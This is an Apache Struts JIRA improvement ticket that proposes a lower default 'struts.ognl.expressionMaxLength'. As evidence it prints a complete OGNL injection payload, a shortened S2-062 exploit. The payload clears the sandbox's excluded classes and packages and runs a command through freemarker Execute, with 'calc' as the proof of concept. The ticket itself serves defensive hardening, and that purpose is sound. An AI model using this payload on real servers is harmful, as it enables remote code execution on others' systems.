[WW-5179] Set 'struts.ognl.expressionMaxLength' to 256 by default - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Improvement
Status: Closed
Priority: Major
Resolution: Fixed
Affects Version/s: None
Fix Version/s: 6.0.0
Component/s: Core
Labels:
None

Language:
- Java

Description

struts.ognl.expressionMaxLength

default set 400

i reduce the st062 exp

%{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
(#request.a.setBean(#request.get('struts.valueStack'))==true)+
(#request.b=#@org.apache.commons.collections.BeanMap@{})+
(#request.b.setBean(#request.get('a').get('context'))==true)+
(#request.c=#@org.apache.commons.collections.BeanMap@{})+
(#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
(#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))}

it's length is 709, so we default set ognl expression length is 400 could protect our app safe.

and！

i think st2 can give a default num: a expression can have # nums limit like 10

thx

Attachments

Issue Links

links to

GitHub Pull Request #553

Activity

People

Assignee:: Unassigned

Reporter:: tanli

Votes:: 0 Vote for this issue

Watchers:: 2 Start watching this issue

Dates

Created:: 01/May/22 07:34

Updated:: 14/Jun/22 09:47

Resolved:: 23/May/22 05:34

Time Tracking

Estimated:

Not Specified

Remaining:

Logged:

20m